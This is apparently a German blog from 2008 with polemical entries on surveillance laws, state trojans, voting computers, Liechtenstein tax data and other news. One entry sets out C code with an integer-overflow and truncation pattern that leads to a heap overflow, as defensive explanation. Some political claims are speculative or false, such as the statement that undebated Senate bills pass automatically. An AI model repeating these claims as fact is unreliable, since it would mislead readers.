Immerhin dürfen sie die Erkenntnisse nicht zweckentfremden. Interessant ist, wie sie die Auskunftspflicht definieren. Man muss Namen, Vorname, Tag und Ort der Geburt, Wohnanschrift und Staatsangehörigkeit angeben. Weitere Auskünfte können sie nur von dem Tatverantwortlichen verlangen, und "entsprechend den Voraussetzungen des §20 Abs 1 des Bundespolizeigesetzes für die dort bezeichneten Personen". Nur — seht ihr da eine Einschränkung eines Personenkreises? Ich nicht.
Also, liebe Leute, das ist jetzt in eurer Verantwortung, eure Bekannten über dieses Gesetz aufzuklären. Erzählt ihnen von der "Quellen-TKÜ", mit der sie Trojaner auch bei Sachbeschädigung etablieren wollen, von der Wohnungsdurchsuchung, wenn man dort Messer oder Schuhe vermuten kann, von den Platzverweisen (da steht übrigens nur, dass sie befristet sein müssen, nicht dass die Frist nicht "1000 Jahre" sein kann, und da steht auch nicht, dass der Ort, dessen man verwiesen wird, nicht "Bundesrepublik Deutschland" sein kann), den Präventivverhaftungen (Guantanamo, ick hör dir trapsen), den Durchsuchungen… Wenn wir da jetzt nicht ein Faß aufmachen, dann wird das so durchgewunken.
Update: Stellt sich raus, dass ausgerechnet Denkmäler nicht zum Schutz gegen Missbrauch videoüberwacht werden dürfen.
Update: Da ist noch ein kleines Detail, das ich übersehen hatte, bei der Benachrichtigungspflicht.
Zudem kann die Benachrichtigung einer […] Person, gegen die sich die Maßnahme nicht gerichtet hat, unterbleiben, wenn diese von der Maßnahme nur unerheblich betroffen wurde und anzunehmen ist, dass sie kein Interesse an einer Benachrichtigung hat.
Ich denke, da sollten jetzt 60 Millionen Briefe beim BKA aufschlagen, die grundsätzliches Interesse an Benachrichtigungen bekunden.

Sun Apr 20 2008

[l] Auch die "Zeit" muss man wohl aus der Liste der seriösen Publikationen entfernen, wenn sie sich derart plumpem Politikerdruck beugt. Schade, gerade in letzter hatten die viele gute Artikel zum Überwachungsstaat, u.a. gerade die von Frau Härpfer. Aber als Frau Härpfer den Postdaten-an-die-USA-weitergeben Skandal öffentlich gemacht hat, und dann die zuständigen zartbesaiteten Politiker offenbar zu grob um Stellungnahmen anging, hat Herr Edathy aus dem Innenausschuss im Bundestag (SPD übrigens, solche Knüppelmethoden würde man sonst eher von der CDU erwarten) seine Beziehungen zur Zeit-Redaktion benutzt, um die Frau rauskanten zu lassen, obwohl deren Artikel über ihn am Ende gar nicht in der Zeit sondern in der Telepolis erschienen war.
Ich werde mal gucken, ob wir Frau Härpfer nicht zum nächsten CCC-Congress eingeladen kriegen.

Mon Apr 14 2008

[l] Banksy rockt mal wieder: "One nation under CCTV", gemalt direkt unter einer CCTV-Kamera.

Tue Apr 8 2008

[l] Massenweise DVD-Rips auf Computern der australischen Polizei gefunden. Aaaaber:
The Australian berichtet unter Berufung auf interne Quellen bei der Polizei, dass "keine offizielle Untersuchung der Vorfälle, die zu einer strafrechtlichen Verfolgung führen könnte, angestrengt werden wird, da eine zu große Zahl von Polizisten beim DVD-Kopieren mitgemacht hat". Stattdessen sollten die Betroffenen ermahnt und an die Verhaltensrichtlinien der Polizei erinnert werden.
Wie immer wenn Polizisten bei Straftaten erwischt werden. Ich verweise da nur auf die diversen Prügel-Kompanien der Polizei bei uns.

Mon Mar 31 2008

[l] Oh wie cool: Percy Schmeiser setzt sich gegen Monsanto durch. Percy ist ein Bauer in Kanada, der auf seinem Feld normales Saatgut ausgebracht hat, aber dann durch Einwehungen Monsanto-Genpflanzen auf dem Feld hatte. Monsanto hatte ihn dann verklagt, er müsse Lizenzgebühren zahlen. Percy hat sich erfolgreich dagegen gewehrt, weil er keine Monsanto-Gifte einsetzt, gegen das deren Genpflanzen resistent sind, und daher keinen Vorteil gezogen habe. Später hat er dann wieder Monsanto-Kontamination auf seinem Feld gefunden.
Er benachrichtigte Monsanto und verlangte, dass der Konzern die Pflanzen entferne. Monsanto bestätigte Schmeiser gegenüber schriftlich, dass es sich um Roundup-Ready-Raps handle und dieser Eigentum von Monsanto sei. Auf das bestehende Urteil bezugnehmend, dass der Besitzer einer Pflanze auch für die Schäden, die durch Kontamination verursacht wurden, haftbar gemacht werden müsse, liess Schmeiser die Pflanzen professionell entfernen und schickte dem Konzern die Rechnung.
Monsanto wollte zahlen, aber nur wenn Schmeiser eine Schweigeerklärung unterzeichnet, was der nicht tun wollte. Daraufhin hat er geklagt und jetzt eine außergerichtliche Einigung mit Monsanto erwirkt, bei der sie alles zahlen. SEHR erfreulich.

Tue Mar 25 2008

[l] US Air Force verschickt versehentlich Raketenkomponenten statt Hubschrauberteilen an Taiwan. Oops. Aber hey, Taiwan ist ja befreundet, die werden da schon keinen Unfug mit gemacht haben.

Tue Mar 18 2008

[l] Sequoia bedroht Ed Felten mit Gerichtsverfahren, falls er ihre "Wahlcomputer" analysiert. New Jersey hatte in der Presse angekündigt, Ed ein paar Wahlmaschinen zum Zertrümmern, äh, zur Analyse zu schicken. Und Sequoia hat (sicher aus gutem Grund) derartig die Hosen voll, dass sie jetzt mit irgendwelcher lächerlichen "Intellectual Property" Scheiße drohen. Und wie immer in solchen Fällen gilt: wäre hier tatsächlich jemand mit "intellect" involviert, wäre es nie so weit gekommen. Boah was bin ich froh, dass Reverse Engineering hierzulande noch relativ streßarm erlaubt ist.
Achtet auf die folgende Formulierung:
Sequoia has also retained counsel to stop any infringement of our intellectual properties, including any non-compliant analysis.
Analyse ist also OK, solange sie von einem gekauften Schergen des Herstellers gemacht wird, aber unabhängige Analyse geht nicht? BWAHAHAHAHAHA! Die haben echt Nerven, die Amis. Ich verstehe ja nicht, wie so eine Firma mit solchen Vorstellungen überhaupt jemals in dem Markt Fuß fassen konnte. Kann sich ja wohl nur um ein Mißverständnis handeln.
Der Bezirk hat sich einschüchtern lassen und will jetzt doch keine Wahlcomputer analysieren lassen. Demokratie? Freie, offene Wahlen? Wir hörten davon… :-(

Mon Mar 17 2008

[l] Der Scientology-Kult hat ein Gegenvideo gegen "Anonymous" gemacht und die DVD an Journalisten verteilt. Auszüge davon gibt es jetzt auf Youtube. Heise hat die Details. Mein Lieblingskommentar bei Youtube:
Yes Scientology, given your track record, we believe every word you say. Thanks for the info.
Oh und weil sich jeder über sowas freut, hier ein whois 81.2.95.177 Auszug:
```
[…]
netname:        CELEBRITY-CENTRE-LONDON-CHURCH-OF-SCIENTOLOGY
[…]
address:        The church of Scientology are a cult, A cult that we will destroy. A cult that I will destroy.
address:        EXPECT US
address:        WHYARETHEYDEAD.net
phone:          +44 20 7262 2000
e-mail:         lol@mudkips.org
[…]
```

Fri Mar 14 2008

[l] Ich fange mal wieder einen Streit mit den gcc-Leuten an, den ich nicht gewinnen kann :-)
Diesmal geht es um Abschneiden von Integer-Werten. Das ist ein seltener Bug, aber es wäre trivial für gcc, in dem Fall eine Warnung rauszuschmeißen. Ich habe schon Produktionscode auditiert, der den Bug hatte, das ist also nicht theoretisch. Die Idee ist folgende:
```
  int needed=0;
  struct node* l;
  for (l=listhead; l; l=l->next) {
    needed+=l->chunksize;
  }
```
Wenn die Liste nicht aus tatsächlich allozierten Dingen besteht (oder auf einer 64-bit Plattform läuft), sondern sagen wir aus Regionen in einer in den Speicher gemappten Datei, oder einer virtuellen Sache wie bei einem Webserver in einer HTTP-Anfrage die Ranges, dann ist das ein Integer Overflow. Bug 1 ist, dass hier int benutzt wird, das ist vorzeichenbehaftet, das gibt nur Ärger. Bei einem Overflow kommt am Ende ein negativer Wert raus, und dann hat man Code wie diesen:
```
  if (needed < MAX_ALLOC) {
    buf=malloc(needed);
```
Wenn needed negativ ist, läuft der Check durch, aber malloc nimmt size_t, der Compiler konvertiert das implizit, und dabei wird das dann ein sehr großer Wert und je nach System klappt womöglich sogar die Allokation.
Bug 2 ist, dass der Overflow nicht abgefangen wird. Wenn ihr euch an das hier erinnert, ist das der 2. Grund, keine vorzeichenbehafteten Werte für Längen oder Größen zu nehmen. Gut, nun nehmen wir mal an, jemand konvertiert das nach unsigned long long, um den Overflow loszuwerden. Haben wir alles schon gehabt. Er checkt auch ordentlich, dass es bei der Addition keinen Überlauf gibt. Aber auf einem 32-bit System ist size_t normalerweise 32-bit breit, und unsigned long long ist 64-bit breit. Bei der Übergabe des Arguments schneidet gcc daher den oberen Teil ab. Ein schlauer Angreifer kann dann den Wert so zurecht fummeln, dass die Summe nach Abschneiden 1 ergibt, aber in der Reinkopier-Schleife dann mehr reinkopiert wird. Ein klassischer Heap-Overflow.
Daher mein Vorschlag, dass man bei Allokations-Längen dem Compiler mitteilen kann, dass hier ein Abschneiden ein echtes Problem wäre.
Wenn die gcc-Leute sich weigern, werde ich bei der dietlibc wahrscheinlich so etwas wie das hier machen:
```
#define malloc(x) ({typeof(x) y=x; (y<0 || (size_t)(y)!=y ? 0 : malloc(y));})
```
Kommentare? Übrigens möchte ich bei der Gelegenheit auch noch mal meine Integer Overflow Seite pluggen.

Thu Mar 13 2008

[l] Endlich haben die USA legalen Zugriff auf die Namen unserer Demonstranten, Falschparker und Schwarzfahrer.
Kritiker warnen in diesem Zusammenhang, dass die USA damit nicht nur Daten von potenziellen Terroristen, sondern auch die von aktenkundig gemachten Demonstranten, Schwarzfahrern oder Asylbewerbern erhalten.

Tue Mar 11 2008

[l] Oh Mann. Elliot Spitzer muss zurücktreten, weil er eine Prostituierte bezahlt hat.
Spitzer ist gerade Gouverneur von New York, aber vorher war er Generalstaatsanwalt von New York und hat in der Position ungeniert große Firmen angepinkelt. Der hat u.a. diverse RAM-Hersteller wegen Preisabsprachen belangt, den Vorsitzenden des NYSE ("Wall Street") angeklagt, und hatte auch ansonsten diverse Fälle in der Hochfinanz, in Banken, Brokern und Versicherungen. Er hat auch die Contentmafia gezwungen, Gelder an die Musiker abzutreten, und wegen Payola (Schmiergeld für Radiostationen, damit sie ihre Songs spielen) verfolgt. Außerdem hat er Abtreibungsgegner belästigt, die Pseudo-Beratungscenter aufgemacht haben, um Frauen von der Abtreibung abzuraten, und sogar gegen die Polizei hat er wegen Korruption vorgegangen. Kurz gesagt: der Mann ist ein echter Held.
Und DER stolpert jetzt ausgerechnet über sowas? Was sagt uns das? Mir sagt das, dass sie dem nichts anderes anhängen konnten, keine Korruption, keine Steuerhinterziehung, keine Baurechtsverletzung, keine schattige Wahlkampffinanzierung, nichts. Eine Prostituierte, dass ich nicht lache. Das muss die Business-Mafia Millionen gekostet haben, jetzt mit diesem Dreck anzukommen, um den loszuwerden. Wow.
Oh und guckt mal, wer ihn verraten hat.
The investigation began last year when banks reported irregular transfers to the Internal Revenue Service, which traced them back to Mr Spitzer and discovered they were made to a high-priced prostitution ring, an unnamed law enforcement official told the Associated Press (AP) news agency.
Die Hochfinanz. Na so ein Zufall.

Wed Feb 27 2008

[l] Ihr werdet es schon gesehen haben: Verfassungsgericht erklärt NRW-Trojanergesetz für nichtig. Leider haben sie es nicht gleich ganz verboten, sondern nur Auflagen gemacht, die der GröIaZ dann eben durch eine Verkettung unglücklicher Mißverständnisse in der Praxis ignorieren wird.
Diese verdeckte Fahndungsmethode dürfe nur dann angewandt werden, wenn es "Anhaltspunkte einer konkreten Gefahr für ein überragend wichtiges Rechtsgut" gebe, entschieden die Karlsruher Richter. Dazu gehörten "Leib, Leben und Freiheit der Person". Das gleiche gelte, wenn die Grundlagen oder der Bestand des Staates oder die Grundlagen der Existenz der Menschen bedroht seien.
Gerade letzteres erinnert an die Antiterror-Gummiparagraphen. Das wird sich vergleichsweise einfach konstruieren lassen, wie ich fürchte.
Update: Ich habe mir gerade von einem Verfassungsrechtler erklären lassen, dass das doch stärker formuliert ist, als ich das verstanden habe. Hier ist das Urteil, ich zitiere mal:
Das Erfordernis tatsächlicher Anhaltspunkte führt dazu, dass Vermutungen oder allgemeine Erfahrungssätze allein nicht ausreichen, um den Zugriff zu rechtfertigen. Vielmehr müssen bestimmte Tatsachen festgestellt sein, die eine Gefahrenprognose tragen (vgl. BVerfGE 110, 33 <61>; 113, 348 <378>).

Mon Feb 25 2008

[l] Die neuen Terroristen: Juxanrufer, und Leute, die in Blogs Kommentare hinterlassen. In einem "anonymen" Blog hat jemand Interna gegen den Bürgermeister von Bad Windsheim ausgepackt und da offenbar auch kein Blatt vor dem Mund genommen. Also hat der Bürgermeister Klage wegen Beleidigung eingereicht, und daraufhin wurde der Staatsschutz aktiv und hat von Durchsuchungen bei seinen politischen Feinden bis zur Rasterfahndung (über die dann auch Jugendliche erwischt wurden, die einen Juxanruf gemacht hatten) das Programm durchgezogen. Unglaublich. Wann kriegt die Hausdurchsuchung endlich mal eine schon längst bitter nötige hohe Schranke? Das ist soziale Ächtung, auch wenn es vielleicht nicht als Strafe gemeint ist, so ist es doch eine. Auch dass man dann ein paar Jahre seine EDV-Technik nicht wieder sieht ist bei dem Wertverlust von IT-Gerät faktisch eine Enteignung. Ich finde es eine Schande, dass da nichts passiert.

[l] Das ISC hat mit BIND 9 Performance-Tests auf diversen Betriebssystemen gemacht. Ich zitiere mal die Ergebnisse:

Server capacity at breaking point
OS	Queries/second
Linux Gentoo 2.6.20.7	93,000
Linux Fedora Core 2.6.20.7	87,000
FreeBSD-7-CURRENT 200708	84,000
FreeBSD-6-stable 200708	55,000
FreeBSD 6.2-RELEASE	51,000
Solaris-10 DevelExpr 5/07	50,000
NetBSD-4.0-Beta 200708	42,000
OpenBSD 4.1-snap-20070427	35,000
Windows 2003 Server	22,000
Windows XP Pro64 5.2.3790 SP2	20,000

Nicht sonderlich Überraschend, wie ich finde. (Danke, Oliver)

Wed Feb 20 2008

[l] Also ich muss ja sagen, vielleicht eignet sich Liechtenstein als Auswanderungsland. Wo habt ihr denn sonst mal eine Regierung Dinge wie "Im Grundsatz vertrauen wir unseren Bürgern" und "die Privatsphäre ist das Fundament unseres Rechtsstaates" oder gar "Wir haben die Erfahrung gemacht, dass die Bereitschaft zum Zahlen von Steuern mit der Zufriedenheit der Bevölkerung korreliert." sagen hören? Die machen gerade massiv Punkte gut bei mir. Und wenn ich diesen Beck schon rumfurzen höre, könnte ich direkt den Mageninhalt schnellentleeren. Was für ein widerliches, armseliges Männchen.

Tue Feb 19 2008

[l] Oh Mann diese Liechtenstein-Nummer wird immer besser. Jetzt haben zwei Rechtsanwälte Strafanzeige gegen die Bundesregierung und den BND gestellt, weil Steuergelder nicht für die Bezahlung von Straftaten verwendet werden dürfen.
Wenig überraschend hat es trotz bundesweiter Razzien kaum neue Selbstanzeigen von Steuerhinterziehern gegeben. Wer hätte das gedacht!
Und dann gibt es da gleich noch eine fette Packung Desinformation:
Für Verärgerung sorgte laut der Zeitung bei den Fahndern auch die Aufforderung von Bundesfinanzminister Peer Steinbrück, die Steuersünder sollten sich selbst anzeigen. Die Fahnder befürchten demnach, dass sich die Steuersünder jetzt noch eilig ans Finanzamt wenden könnten, um eine Bestrafung abzuwenden.
Natürlich ist das Gegenteil der Fall. Es geht ja nicht darum, die Leute alle zu bestrafen, sondern um die Steuer-Nachforderungen. Das ist auch der teure Teil, daher gibt es so wenig Selbstanzeigen. Die allermeisten Verfahren werden auch über Vergleich beendet, da zahlt man dann halt ein paar Tagessätze Strafe und gut ist. In den Bau wandert da niemand.
Aber die Krönung ist, dass Liechtenstein jetzt mit rechtlichen Schritten droht.
Die Jagd nach Steuersündern, die über Stiftungen in Liechtenstein Steuern hinterzögen, zeige eine neue Qualität in der Steuereintreibung von Deutschland. Er [Erbprint Alois von und zu Liechtenstein] drohte der Bundesrepublik mit juristischen Schritten, "um unsere Bürger und auch die Anleger … vor derartigen Untersuchungsmethoden, die in Liechtenstein gesetzlich nicht gedeckt sind, zu schützen."
Und, sehr schön auch, er hat offenbar mein Blog gelesen und sagt folgendes:
"Offensichtlich will man in großem Stil Hehlerei betreiben."
Update: Die Berliner Zeitung hat auch noch was. Sie wollen erfahren haben, dass der BND seit Jahren Liechtensteiner Banken ausgespäht hat, im Auftrag noch der Rot-Grünen Regierung. Sie bestreiten auch die Darstellung, das die Daten von einem Selbstanbieter kämen, quasi auf Impetus der Quelle statt des BNDs. Rot-Grün soll das losgetreten haben, um a) eine frühere BND-Studie zu belegen, die auf dubiosen Quellen beruht hatte, und b) weil die CDU ihre Geldwäsche über Stiftungen in Liechtenstein gemacht hatte :-) Oh und übrigens:
[Sprecher des Finanzministeriums Thorsten] Albig sagte, nach seiner Kenntnis sei der BND lediglich Übermittler der Daten gewesen. Bezüglich der Bezahlung seien das Finanzministerium und das Kanzleramt von Anfang an beteiligt gewesen.
Nanu? Jetzt wollen sie plötzlich kriminelle Handlungen vom BND fern halten? Gut, immerhin geben sie ja damit zu, dass das Finanzministerium und das Kanzleramt kriminell sind. Alle in den Bau und Neuwahlen.
[l] Also ich freue mich ja, dass die Chinesen jetzt im Patent-Trolling mitspielen. Die haben da genug billige Arbeitskräfte, um unser Patentamt mit Bullshit-Bingo-Anträgen zu fluten, und ich hoffe, dass sie das auch tun. Je mehr Sand die uns ins Getriebe tun, desto besser. Dieses ganze Patentsystem ist für den Arsch, war es schon immer, und wird es auch bleiben, außer wir oder die Chinesen in dem Fall führen seinen Kollaps herbei.
Patent. Dass ich nicht lache.
Und der nächste Schritt ist, dass China uns mit Urheberrechts-Bullshit zupflastert, und unsere Nachbauer wegen Urheberrechtsverletzungen plattmacht.
Dass das gesamte System hier noch nicht zusammengebrochen ist, liegt m.E. daran, dass die Parasiten und Trolle bisher ein Interesse daran haben, den Wirt am Leben zu erhalten, damit sie weiter saugen können. Das Interesse haben die Chinesen nicht. Und daher hoffe ich inständig, dass die hier alles plattmachen, was sie plattgemacht kriegen, bis wir ENDLICH aufwachen und Patente und Urheberrecht abschaffen oder zumindest soweit entkernen, dass man damit leben kann.
[l] Wikileaks.org ist down. Nicht der Server, das DNS dazu. Ein Bush-Richter hat für Julius Bär eine Verfügung erlassen, die den Registrar dazu zwang. Die ganze Geschichte stinkt zum Himmel, hier gibt es die Korrespondenz mit dem Anwalt zu sehen. Man beachte wie der Anwalt ihnen weder sagen wollte, um welchen Klienten es ging, noch um welche Dokumente.
Wikileaks remains available publishing from non-US, non-Chinese jurisdictions including http://wikileaks.cx/ and http://wikileaks.be/. See http://wikileaks.cx/wiki/Wikileaks:Cover_Names for more.
Und das alles bloß wegen einiger Dokumente, nach denen die Bank für ihre Kunden die Steuerhinterziehung und Geldwäsche übernommen hat, was ja eh niemanden überrascht, davon leben schließlich alle Banken mit Niederlassung auf den Cayman-Inseln. Die Bank Bär hat bloß Angst, dass ihnen jetzt die Kunden wegbleiben, wo Fälle von Kunden bekannt geworden sind.
BTW: jemand hat einen Torrent gemacht :-)
Oh und noch was, falls jemand wissen will, WIE viel Macht die Banken haben: die haben jetzt ein eigenes US-Gesetz gekriegt, das sie vor einem Patenttroll beschützt. Das Gesetz ist schon durch den Kongress durch, und dann müsste der Steuerzahler (!) dem Patenttroll bis zu eine Milliarde Dollar zahlen als Ausgleich für die Enteignung.

Sat Feb 16 2008

[l] Das Bundeskriminalamt bitte um unsere Mithilfe: Neue BKA-Stellenausschreibung zum Bundestrojaner im Bonner General-Anzeiger vom 16./17.2.2008. Händeringend bitten sie inständig darum, dass sich ein paar Ex-Telekomler bewerben, die für noch weniger Geld bereit sind, bei einer Repressionsbehörde arbeiten wollen, um das Volk zu bespitzeln. Immer daran denken: sie lieben uns doch alle, sie beschnüffeln uns nur zu unserem eigenen Wohl!!1!
Interessant an der Sache: sie suchen explizit Leute mit Unix/Linux-Kenntnissen. Aber ich mache mir da ehrlich gesagt wenig Sorgen. Sie suchen nur Leute mit Uni-Abschluß und das soll in C/C++ gemacht werden. Meiner Erfahrung nach muss man sich bei der Schnittmenge daraus keine Sorgen machen, dass das Projekt jemals fertig wird oder gar funktioniert.
Update: Die haben auch in der FAZ inseriert. Ich frage mich ja, was die glauben, welcher FAZ-Leser mit deren Gehaltsvorstellungen (11 TVÖD) zufrieden wäre. (Danke, Henner)

Thu Feb 14 2008

[l] JAAAAA, ihr könnt AUFHÖREN, mir den Download-Link für Quarks & Co zu mailen. Der ist offensichtlich so einfach zu finden, dass ihn alle Blogleser selbst gefunden haben, und die haben mir das dann auch alle einmal gemailt :-)
Ich persönlich boykottiere sowas ja, solange es sich als "Podcast" bezeichnet. Scheiß Apple-Scheiße immer.

Tue Feb 12 2008

[l] Die gelangweilten Russen machen sich offenbar eine seichte Abendunterhaltung daraus, die US Navy vorzuführen, indem sie da im Ultratiefflug drüber fliegen. RIA Novosti hat auch eine schöne Geschichte dazu. Die sind so tief geflogen, dass sie schöne Fotos vom Deck und den vollen Hosen der Amis gemacht haben, und die haben sie dann als freundschaftliche Geste dem Pentagon geschickt. Das wird wohl den Kommandanten die Karriere gekostet haben. Ich hätte es ja noch cooler gefunden, wenn sie eine Ladung frische Unterwäsche dazu gelegt hätten, denn wenn der Feind so nahe rankommt, wäre es das im Kriegsfall gewesen für den Flugzeugträger.

Mon Feb 11 2008

[l] Ich verstehe ja auch nicht, wieso da sonst keiner drüber berichtet. Die Times hat im Januar eine Artikelserie über die Amis und ihre Atombombenpläne gemacht, die es in sich hat.
Eine FBI-Übersetzerin namens Sibel Edmonds hat von einem Deal mitgekriegt, mit dem die Amis ihre Atombombengeheimnisse über die Türkei an Pakistan geleakt haben. Die Story ist schon sehr bizarr, weil da zu allem Überfluß auch noch Israel involviert sein soll. Gut, es ist schon auffällig, dass Israel immer gegen den Iran aber nie gegen Pakistan wettert wegen angeblicher Atomwaffen. Pakistans Atomguru hat ja die Pläne bekanntermaßen weiter verkauft, u.a. soll auch das Iraner Atomprogramm darauf basieren. Da bietet sich die Interpretation an, dass sie die Pläne absichtlich an den Iran geleakt haben, um ihn dann wegen des Atomprogramms anpinkeln zu können, das man ihnen selbst verkauft hat.
"If you made public all the information that the FBI have on this case, you will see very high-level people going through criminal trials," she said.
Her story shows just how much the West was infiltrated by foreign states seeking nuclear secrets. It illustrates how western government officials turned a blind eye to, or were even helping, countries such as Pakistan acquire bomb technology.
The wider nuclear network has been monitored for many years by a joint Anglo-American intelligence effort. But rather than shut it down, investigations by law enforcement bodies such as the FBI and Britain's Revenue & Customs have been aborted to preserve diplomatic relations.
Der Lacher ist jetzt, wie Bush aus der Sache raus kommen will. Seine Junta ist ja involviert, und das wäre Hochverrat und trägt unangenehme Strafen. Also haben sie ein Gesetz gemacht, dass den Verkauf von Atomgeheimnissen an die Türkei legalisiert, und das haben sie in den Senat eingebracht, wo aber nicht darüber abgestimmt wird, denn wenn ein Gesetz eingebracht aber nicht debattiert wird, gilt es nach ein paar Monaten automatisch als angenommen. Sozusagen ein Gesetzes-Stealth-Launch.
Lustiges Detail am Rande: eine andere Übersetzerin war die Tochter eines Pakistanischen Botschaftsfunktionärs, die dafür Top Secret Clearance gekriegt hat.

Sat Feb 2 2008

[l] Exxon hat im letzten Jahr 40 Milliarden Dollar Profit gemacht. Hey, da könnten sie fast einmal Yahoo für kaufen!1!! :-)

Sat Jan 26 2008

[l] Bundespolizei-Reform verabschiedet. Ein weiterer schwarzer Tag für Deutschland. Und, wie immer: Wer hat uns verraten? Die Sozialdemokraten!
Dem Innenministerium wurde auferlegt, in zwei Jahren einen Bericht über die Neuorganisation vorzulegen. Außerdem wird das Ministerium aufgefordert, den Umbau sozialverträglich zu gestalten. Damit gab sich die SPD zufrieden. Über Strukturen und Standorte darf ohnehin allein das Ministerium entscheiden. "Wir stimmen nicht leichten Herzens zu", bekannte der SPD-Abgeordnete Michael Hartmann im Bundestag.
Na dann ist ja alles gut. Die SPD hat beim Zustimmen kein leichtes Herz gehabt. Boah, und ich habe mir schon Sorgen gemacht.

Thu Jan 24 2008

[l] Deutscher Journalist in Kasachstan nach Mordanschlag nur knapp mit dem Leben davon gekommen. Der Mann hat u.a. für die taz aus Zentralasien berichtet, und sich u.a. mit Berichten über Massaker in Andischan in Usbekistan hinreichend unbeliebt gemacht, dass er da jetzt Einreiseverbot hat. Er hat wohl gerade an einer Geschichte über den Wirtschaftswachstum in Kasachstan gearbeitet, und die lokale Polizei ist sich sicher, dass das nur ein normaler Raubüberall war, wo er halb tot bei -30° aus dem Auto geschmissen wurde. Ein Wunder, dass er das überhaupt überlebt hat.
Hier gibt es seinen Bericht über das Massaker als PDF. Usbekistan war das Land mit der "Islamic Jihad Union", den virtuellen Phantomterroristen, die an unseren Terroranschlägen Schuld gewesen sein sollen.
Mal schauen, ob da jemand was rausgefunden wird. Marcus selbst kann sich jedenfalls an keine Details erinnern.
Tja, früher mußte man als Journalist nach Kasachstan gehen, um ein Land ohne Pressefreiheit zu erleben. Heute drehen sie den Journalisten auch hier den Abhörschutz ab. Wie lange das wohl dauert, bis auch bei uns widerborstige Journalisten bedauerlich verunfallen? (Danke, Rena)
[l] Zu der Bayerntrojaner-Meldung… ich habe das Schreiben auch gesehen. Und ich halte es für authentisch. Die Firma existiert, bietet auf ihrer Webseite Überwachungs-Kram an, und sie ist auch noch ETSI-Member in den entsprechenden Gremien. Wir haben ein bißchen hinterher gegoogelt, und die haben schon diverse Aufträge für die Bayerischen Bedarfsträger gemacht, und im Saarland haben wir auch was gefunden. Das ist bemerkenswert, weil die Firma in Hessen sitzt.
Bemerkenswert an dem Angebot sind folgende Details:
1. Die Lieferzeit ist als 4-6 Wochen ab Eingang des Auftrags angegeben. Warum so lange? Ist das vielleicht nur eine könnte-würde-hätte Sache und die Firma traut sich zu, das dann mal eben in den 4-6 Wochen zu hacken?
2. Das Geschäftsmodell ist auf Miete ausgelegt; man zahlt nicht für die Entwicklung der Software, sondern pro Monat und Einsatz und noch einmal ein paar tausend Euro pro Installation. Damit ist aber wohl nicht die Installation beim Opfer gemeint, sondern das Aufsetzen von deren Schnittstellen.
3. Die bieten zwei Trojaner an, einen zum Skype-Abschnorcheln und einen zum https-Abschnorcheln (offenbar über eine Art Browser-Plugin realisiert, supported IE und Firefox).
4. Das Angebot bietet nur Trojaner für Windows an. Apple- und Linux-User sind damit erst mal sicher.
Wie die Piratenpartei schon sagt, stellt sich die Frage, wie sich das für die Firma rentieren soll. Entweder die haben die Software gar nicht selber gehackt sondern sie sind nur der Distributor und arbeiten aus der Garage der Eltern auf dem Bauernhof auf dem Dorf (wie die Nedap-Importeure), oder sie entwickeln das doch selber, aber bezahlen ihre Mitarbeiter nicht ordentlich, oder sie gehen davon aus, dass das stark nachgefragt wird. Bei den Preisen ist jedenfalls nicht daran zu denken, wie bisher von den Politiker angesagt den Trojaner jeweils als Unikat für den jeweiligen Angriff neu zu entwickeln. Das Angebot spricht da auch von fertigen Modulen, die man dann halt zusammen stöpselt. Eines davon ist ein webbasierter Streaming-Server, über den man dann die abgeschnorchelten Skype-Telefonate hören kann. Sie bieten natürlich auch AES-Verschlüsselung an, sagen sie.
Ohne irgendwas davon mal in Aktion gesehen zu haben, maße ich mir mal folgende Glaskugel-Aussagen an:
- Der Streaming-Kram hat mit Sicherheit irgendwelche Remote Exploits drin. Da wären sie einfach mal die ersten auf der Welt, die das beim ersten Ansatz richtig hin kriegen.
- Sie nehmen da einen noch dünnbändigeren Codec als Skype für ihre Audiokompression. Müssen sie auch, sonst reicht die ausgehende Bandbreite nicht für beide ausgehenden Streams. Das heißt: wenn man das Signal so verschlechtert, dass es mit sehr geringer Bandbreite nicht komprimierbar ist, dann hören die nichts. Bisschen Rauschen, Volksmusik in den Hintergrund, Autobahn, Eisenbahn oder Flughafen in der Nähe — da wird man nicht viel verstehen auf dem Bedarfsträger-Mitschnitt.
- Wenn sie das zweimal aus dem Opferrechner rausleiten, dann haben sie merklich mehr ausgehende Bandbreite. Das kann ein aufmerksamer PC-Benutzer sehen.
Ich bin mir uneins, wie das Angebot zu verstehen ist. Auf der einen Seite liest es sich, als hätten sie alles schon fertig. Auf der anderen Seite sieht die lange Lieferfrist so aus, als würden sie das dann "mal schnell" programmieren, wenn da ein Auftrag reinkommt. Wenn sie das noch nicht fertig haben, wünsche ich viel Spaß dabei, Skype zu reverse engineeren. Das ist kein Selbstläufer, die haben da Maßnahmen ergriffen.
Update: noch was vergessen: die verkaufen der Polizei auch gleich zwei (!) Proxy-Server zum Verschleiern der IPs. Zwei! Das finde ich bemerkenswert. Hat wohl doch mal jemand aufgepaßt bei unseren Tor-Vorträgen :-)
[l] Wer mal sehen will, mit was für Leuten wir es bei den Wahlcomputern zu tun haben: Hier ist ein Interview mit einem Herrn Christoph Bieber. Und der argumentiert da gänzlich unbelastet von jedweder Sachkenntnis:
Alle Tests mit den Wahlcomputern sind zufriedenstellend verlaufen. Die Geräte haben alle Probedurchläufe bestanden, mit einem oder null Fehlern. Deshalb ist die Entscheidung des Staatsgerichtshofs richtig.
Hey, nur ein Fehler, was kann da schon passieren. Lieber Herr Bieber, ein erfolgreicher Selbsttest prüft, ob die gewollten Features (für die es Tests gibt) funktionieren. Er prüft nicht, ob es da nicht noch ungewollte Features gibt, die sich z.B. für Wahlfälschung benutzen lassen. Das hat genau NICHTS miteinander zu tun.
Der Chaos Computer Club (CCC) hat den Verbotsantrag geschickt inszeniert. Bei einem alleinstehenden Computer einen Chip auszutauschen, ist einfach. Aber bei einem Wahlcomputer, der in eine Wahl eingebunden ist, also überwacht wird, ist das nicht möglich. Auch einen Wahlcomputer in einen Schachcomputer zu verwandeln, wie das der CCC schon gemacht hat, ist griffig und öffentlichkeitswirksam. Aber wenn ich auf dem Stimmzettel Tic Tac Toe spiele, heißt es auch nicht, dass ich den Stimmzettel gehackt hätte.
